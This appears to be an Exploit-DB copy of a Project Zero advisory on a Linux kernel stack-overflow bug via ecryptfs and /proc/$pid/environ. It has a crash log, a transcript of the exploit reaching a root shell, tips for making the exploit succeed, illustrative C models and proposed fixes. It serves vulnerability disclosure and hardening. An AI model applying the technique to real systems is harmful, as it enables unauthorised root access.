Linux Kernel – ‘ecryptfs’ ‘/proc/$pid/environ’ Local Privilege Escalation

Author: Google Security Research
Date: 2016-06-21
Category: local
Platform: linux
Source: https://www.exploit-db.com/exploits/39992/

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836

Stacking filesystems, including ecryptfs, protect themselves against deep nesting, which would lead to kernel stack overflow, by tracking the recursion depth of filesystems. For example, ecryptfs implements this in ecryptfs_mount() as follows:

    s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;

    rc = -EINVAL;
    if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
        pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
        goto out_free;
    }

The files /proc/$pid/{mem,environ,cmdline}, when read, access the userspace memory of the target process, involving normal pagefault handling if necessary. If it were possible to mmap() them, an attacker could create a chain of, e.g., /proc/$pid/environ mappings where process 1 has /proc/2/environ mapped into its environment area, process 2 has /proc/3/environ mapped into its environment area, and so on. A read from /proc/1/environ would invoke the pagefault handler for process 1, which would invoke the pagefault handler for process 2, and so on. This would, again, lead to kernel stack overflow.

One interesting fact about ecryptfs is that, because of the encryption involved, it doesn't simply forward mmap to the lower file's mmap operation. Instead, it has its own page cache, maintained using the normal filemap helpers, and performs its cryptographic operations when dirty pages need to be written out or when pages need to be faulted in. Therefore, not only its read and write handlers but also its mmap handler use only the lower filesystem's read and write methods.

This means that using ecryptfs, you can mmap [decrypted views of] files that normally wouldn't be mappable.
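A minimal C model of this point may help. All names here (model_file_ops, environ_like_read, upper_fault and so on) are hypothetical and are not kernel APIs. The sketch shows only one thing: a layer that fills its own page cache through the lower file's read() never needs the lower file's mmap method. As a result, a file with mmap == NULL, like /proc/$pid/environ, can still end up backing a mapping. Decryption is deliberately omitted.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

#define MODEL_PAGE_SIZE 4096

/* Hypothetical, simplified file-operations table with only the two methods
 * that matter here. A NULL mmap means the file cannot be mapped directly. */
struct model_file_ops {
    ssize_t (*read)(void *priv, char *buf, size_t len, off_t pos);
    int (*mmap)(void *priv);
};

struct model_file {
    const struct model_file_ops *ops;
    void *priv;
};

/* Stand-in for a file like /proc/$pid/environ: readable, no mmap method. */
static ssize_t environ_like_read(void *priv, char *buf, size_t len, off_t pos)
{
    const char *data = priv;
    size_t total = strlen(data);
    size_t n;

    if (pos < 0 || (size_t)pos >= total)
        return 0;
    n = total - (size_t)pos;
    if (n > len)
        n = len;
    memcpy(buf, data + pos, n);
    return (ssize_t)n;
}

static const struct model_file_ops environ_like_ops = {
    .read = environ_like_read,
    .mmap = NULL,
};

/* Model of the upper layer's fault handler: it fills its own page-cache page
 * by calling the lower file's read() and never looks at lower->ops->mmap. */
static int upper_fault(const struct model_file *lower,
                       char page[MODEL_PAGE_SIZE], off_t page_index)
{
    ssize_t n;

    memset(page, 0, MODEL_PAGE_SIZE);
    n = lower->ops->read(lower->priv, page, MODEL_PAGE_SIZE,
                         page_index * MODEL_PAGE_SIZE);
    return n < 0 ? -1 : 0;
}
```

In the real kernel the "read" in the fault path is what reaches back into another process's memory. That is why this design choice matters for the recursion described next.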

Combining these things, it is possible to trigger recursion with arbitrary depth where:

a reading userspace memory access in process A (from userland or from copy_from_user())
  causes a pagefault in an ecryptfs mapping in process A, which
  causes a read from /proc/{B}/environ, which
  causes a pagefault in an ecryptfs mapping in process B, which
  causes a read from /proc/{C}/environ, which
  causes a pagefault in an ecryptfs mapping in process C, and so on.
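The chain can be modeled as a userspace toy in a few lines of C. This sketch rests on stated assumptions:

- FILESYSTEM_MAX_STACK_DEPTH is taken as 2, its value in kernel headers of that period.
- The struct and function names are invented.

It illustrates why the per-mount depth check does not help here. Every ecryptfs mount in the chain sits directly on procfs (depth 0) and so gets depth 1. Yet the fault recursion grows with the number of processes in the chain.

```c
#include <assert.h>
#include <stddef.h>

#define FILESYSTEM_MAX_STACK_DEPTH 2 /* assumed: the value in kernels of that era */

/* Hypothetical model: process i has an ecryptfs mapping whose lower file is
 * /proc/{i+1}/environ; each such mount sits directly on procfs. */
struct model_process {
    int mount_stack_depth;             /* s_stack_depth of its ecryptfs mount */
    struct model_process *environ_src; /* whose environ backs the mapping */
};

/* Mirrors the quoted check: the depth is computed per mount, only from the
 * superblock directly below it. Returns 1 if the mount is allowed. */
static int model_mount_depth_ok(int lower_depth, int *out_depth)
{
    int depth = lower_depth + 1;

    if (depth > FILESYSTEM_MAX_STACK_DEPTH)
        return 0;
    *out_depth = depth;
    return 1;
}

/* A read that faults in p's mapping reads the next process's environ, which
 * faults again, and so on. Returns the nesting depth reached; in the kernel
 * every level would consume more of one fixed-size kernel stack. */
static int model_fault(const struct model_process *p)
{
    if (p->environ_src == NULL)
        return 1; /* end of the chain: an ordinary page, no further fault */
    return 1 + model_fault(p->environ_src);
}
```

With 100 processes, every mount passes the check with depth 1, while model_fault() on the first process nests 100 levels deep.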

On systems with the /sbin/mount.ecryptfs_private helper installed (e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked during installation), this bug can be triggered by an unprivileged user. The mount helper considers /proc/$pid, where $pid is the PID of a process owned by the user, to be a valid mount source because the directory is "owned" by the user.
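Here is a hedged C illustration of why /proc/$pid passes such a test. It shows a simplified ownership check, followed by one possible hardening that refuses sources on procfs. Neither function is the actual code of mount.ecryptfs_private, and both names are hypothetical. PROC_SUPER_MAGIC (0x9fa0) is the procfs magic number from <linux/magic.h>.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/statfs.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef PROC_SUPER_MAGIC
#define PROC_SUPER_MAGIC 0x9fa0 /* procfs magic, as in <linux/magic.h> */
#endif

/* Hypothetical simplification of an ownership-based source check: accept the
 * source if it is a directory owned by the calling (real) user. The
 * /proc/$pid directory of one of the user's own processes passes this. */
static bool owner_check_only(const char *src)
{
    struct stat st;

    if (stat(src, &st) != 0 || !S_ISDIR(st.st_mode))
        return false;
    return st.st_uid == getuid();
}

/* Illustrative hardening (an assumption, not the helper's real logic):
 * additionally refuse any source that lives on procfs. */
static bool owner_check_no_procfs(const char *src)
{
    struct statfs sfs;

    if (!owner_check_only(src))
        return false;
    if (statfs(src, &sfs) != 0)
        return false;
    return sfs.f_type != PROC_SUPER_MAGIC;
}
```

For the /proc/<pid> directory of one of your own (dumpable) processes, owner_check_only() would typically return true while owner_check_no_procfs() returns false. An ordinary directory you created passes both.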

I have attached both a generic crash PoC and a build-specific exploit that can be used to gain root privileges from a normal user account on Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version 4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux".

dmesg output of the crasher:

    [ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0
    [ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028] PGD 1e0d067 PUD 0
    [ 80.040028] Thread overran stack, or stack corrupted
    [ 80.040028] Oops: 0000 [#1] SMP
    [ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video
    [ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu
    [ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
    [ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000
    [ 80.040028] RIP: 0010:[<ffffffff810c9a33>]  [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028] RSP: 0000:ffff88021fc03d70  EFLAGS: 00010046
    [ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068
    [ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200
    [ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000
    [ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200
    [ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68
    [ 80.040028] FS:  00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000
    [ 80.040028] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0
    [ 80.040028] Stack:
    [ 80.040028]  ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00
    [ 80.040028]  ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68
    [ 80.040028]  ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200
    [ 80.040028] Call Trace:
    [ 80.040028]  <IRQ>
    [ 80.040028]  [<ffffffff810b4b83>] update_curr+0xe3/0x160
    [ 80.040028]  [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0
    [ 80.040028]  [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80
    [ 80.040028]  [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0
    [ 80.040028]  [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0
    [ 80.040028]  [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60
    [ 80.040028]  [<ffffffff810ee961>] update_process_times+0x51/0x60
    [ 80.040028]  [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60
    [ 80.040028]  [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70
    [ 80.040028]  [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290
    [ 80.040028]  [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0
    [ 80.040028]  [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60
    [ 80.040028]  [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50
    [ 80.040028]  [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90
    [ 80.040028]  <EOI>
    [ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d
    [ 80.040028] RIP  [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028]  RSP <ffff88021fc03d70>
    [ 80.040028] CR2: fffffffe4b9145c0
    [ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
    [ 80.040028] ---[ end trace 616e3de50958c35b ]---
    [ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt
    [ 80.040028] Shutting down cpus with NMI
    [ 80.040028] Kernel Offset: disabled
    [ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt

Example run of the exploit in a VM with 4 cores and Ubuntu 16.04 installed:

    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
    compile.sh  exploit.c  hello.c  suidhelper.c
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
    compile.sh  exploit  exploit.c  hello  hello.c  suidhelper  suidhelper.c
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit
    all spammers ready
    recurser parent ready
    spam over
    fault chain set up, faulting now
    writing stackframes
    stackframes written
    killing 2494
    post-corruption code is alive!
    children should be dead
    coredump handler set. recurser exiting.
    going to crash now
    suid file detected, launching rootshell...
    we have root privs now...
    root@user-VirtualBox:/proc# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

(If the exploit crashes even with the right kernel version, try restarting the machine. Also, ensure that no program like top/htop/... is running that might try to read process command lines. Note that the PoC and the exploit don't really clean up after themselves and leave mountpoints behind that prevent them from re-running without a reboot or manual unmounting.)

Note that Ubuntu compiled their kernel with CONFIG_SCHED_STACK_END_CHECK turned on, which makes it harder than it used to be to exploit this bug without crashing the kernel. In addition, an overwrite of addr_limit would be useless because, at the time the thread_info is overwritten, there are multiple instances of kernel_read() on the stack. Still, the bug is exploitable by carefully aligning the stack so that the vital components of thread_info are preserved, stopping with an out-of-bounds stack pointer, and overwriting the thread stack using a normal write to an adjacent allocation of the buddy allocator.

Regarding the fix, I think the following would be reasonable:

- Explicitly forbid stacking anything on top of procfs by setting its s_stack_depth to a sufficiently large value. In my opinion, there is too much magic going on inside procfs to allow stacking things on top of it, and there isn't any good reason to do it. (For example, ecryptfs invokes open handlers from a kernel thread instead of normal user process context, so the access checks inside VFS open handlers are probably ineffective - and procfs relies heavily on those.)
- Forbid opening files with f_op->mmap==NULL through ecryptfs. If the lower filesystem doesn't expect to be called in pagefault-handling context, it probably shouldn't be called in that context.
- Create a dedicated kernel stack cache outside of the direct mapping of physical memory that has a guard page (or a multi-page gap) at the bottom of each stack, and move the struct thread_info to a different place (if nothing else works, the top of the stack, above the pt_regs).
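The first two suggestions can be sketched as a small C model. This is not the upstream patch. The structures are simplified stand-ins with hypothetical model_* names, and FILESYSTEM_MAX_STACK_DEPTH is assumed to be 2. The -ENODEV returned for unmappable lower files is an arbitrary choice for illustration.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

#define FILESYSTEM_MAX_STACK_DEPTH 2 /* assumed: the value in kernels of that era */

/* Hypothetical, simplified stand-ins for the kernel structures involved. */
struct model_sb { int s_stack_depth; };
struct model_fops { int (*mmap)(void); };

/* Placeholder mmap method for a "normal", mappable lower file. */
static int model_generic_file_mmap(void) { return 0; }

/* Suggestion 1: procfs pins its own depth at the maximum, so any filesystem
 * stacked on top computes depth + 1 > FILESYSTEM_MAX_STACK_DEPTH. */
static void model_proc_fill_super(struct model_sb *sb)
{
    sb->s_stack_depth = FILESYSTEM_MAX_STACK_DEPTH;
}

/* The existing check quoted from ecryptfs_mount(), unchanged. */
static int model_ecryptfs_mount(const struct model_sb *lower, struct model_sb *s)
{
    s->s_stack_depth = lower->s_stack_depth + 1;
    if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH)
        return -EINVAL;
    return 0;
}

/* Suggestion 2: refuse lower files that have no mmap method, since their
 * handlers would otherwise be invoked from page-fault context. */
static int model_ecryptfs_open(const struct model_fops *lower_fops)
{
    if (lower_fops->mmap == NULL)
        return -ENODEV;
    return 0;
}
```

Either check alone breaks the chain described earlier. The first refuses the mount on /proc/$pid. The second refuses to open /proc/$pid/environ through ecryptfs even if such a mount existed.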

While race conditions, for example, are more common than stack overflows in the Linux kernel, the whole vulnerability class of stack overflows is easy to mitigate. Moreover, the kernel is complicated enough for unbounded recursion to emerge in unexpected places, or perhaps even for someone to discover a way to build a call chain whose depth is bounded but still too large. Therefore, I believe that guard pages are a useful mitigation.

Nearly everywhere, stack overflows are caught using guard pages nowadays; this includes Linux userland, but also {### TODO ###} and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).
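The guard-page mechanism itself is easy to observe in userland. The following C sketch assumes Linux with POSIX mmap(), mprotect() and sigaction(), and guard_page_demo() is a hypothetical name. It maps a small region and turns its lowest page into a PROT_NONE guard, as below a downward-growing stack. It then shows that touching the guard raises SIGSEGV instead of silently writing into whatever lies below, which is the property the report proposes for kernel stacks.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

static sigjmp_buf guard_env;

/* Jump back out of the faulting access instead of returning into it. */
static void on_segv(int sig)
{
    (void)sig;
    siglongjmp(guard_env, 1);
}

/* Returns 1 if an access to the guard page faulted (and was caught),
 * 0 if it did not fault, -1 on setup error. */
static int guard_page_demo(void)
{
    long page = sysconf(_SC_PAGESIZE);
    size_t len = 4 * (size_t)page;
    struct sigaction sa, old;
    volatile int faulted = 0;
    char *base = mmap(NULL, len, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    if (base == MAP_FAILED)
        return -1;
    /* The lowest page becomes the guard, as below a downward-growing stack. */
    if (mprotect(base, (size_t)page, PROT_NONE) != 0) {
        munmap(base, len);
        return -1;
    }

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    base[len - 1] = 1; /* usable part of the region: no fault */
    if (sigsetjmp(guard_env, 1) == 0)
        ((volatile char *)base)[0] = 1; /* guard page: raises SIGSEGV */
    else
        faulted = 1;

    sigaction(SIGSEGV, &old, NULL);
    munmap(base, len);
    return faulted;
}
```

The design point carries over to kernel stacks: an overflow into an unmapped page stops immediately at the faulting access. Without such a page, the overflow continues into adjacent memory such as thread_info.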

Oh, and by the way: the BUG_ON(task_stack_end_corrupted(prev)) in schedule_debug() ought to be a direct panic instead of an oops. At the moment, when you hit it, you get a recursion between the scheduler invocation in do_exit() and the BUG_ON in the scheduler, and the kernel recurses down the stack until it hits something sufficiently important to cause a panic.
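A toy C model of the stack-end check and the suggested behavior follows. It rests on three assumptions:

- STACK_END_MAGIC is 0x57AC6E9D, its value in <linux/magic.h>.
- The stack grows down, so the magic word sits at the lowest usable address.
- The model_* names are hypothetical, and abort() stands in for panic().

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define STACK_END_MAGIC 0x57AC6E9DUL /* value from <linux/magic.h> */
#define MODEL_STACK_WORDS 512

/* Hypothetical task stack: stack[0] is the lowest usable word (what the
 * kernel calls end_of_stack()); the stack grows down toward it. */
struct model_task {
    unsigned long stack[MODEL_STACK_WORDS];
};

static void model_set_stack_end_magic(struct model_task *t)
{
    t->stack[0] = STACK_END_MAGIC;
}

/* Simulates `words` words of stack usage, written from the top down. */
static void model_use_stack(struct model_task *t, size_t words)
{
    for (size_t i = 0; i < words && i < MODEL_STACK_WORDS; i++)
        t->stack[MODEL_STACK_WORDS - 1 - i] = 0xdeadbeefUL;
}

/* Same idea as the kernel's task_stack_end_corrupted(). */
static bool model_task_stack_end_corrupted(const struct model_task *t)
{
    return t->stack[0] != STACK_END_MAGIC;
}

/* The suggested behavior: a corrupted stack end means this stack can no
 * longer be trusted, so halt at once instead of raising an oops whose
 * do_exit() path calls back into the scheduler and hits the check again. */
static void model_schedule_debug(const struct model_task *prev)
{
    if (model_task_stack_end_corrupted(prev)) {
        fprintf(stderr, "stack end corrupted, halting\n");
        abort(); /* stands in for panic() */
    }
}
```

Using all but the last word leaves the magic intact. Using one more word overwrites it, and model_schedule_debug() would then stop the system rather than recurse.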

I'm going to send (compile-tested) patches for my first two fix suggestions and the recursive oops bug. I haven't written a patch for the guard pages mitigation because I'm not familiar enough with the x86 subsystem for that.

Notes regarding the exploit:

- It makes an invalid assumption that causes it to require at least around 6GB of RAM.
- It has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.
- The page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.

Proof of Concept:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39992.zip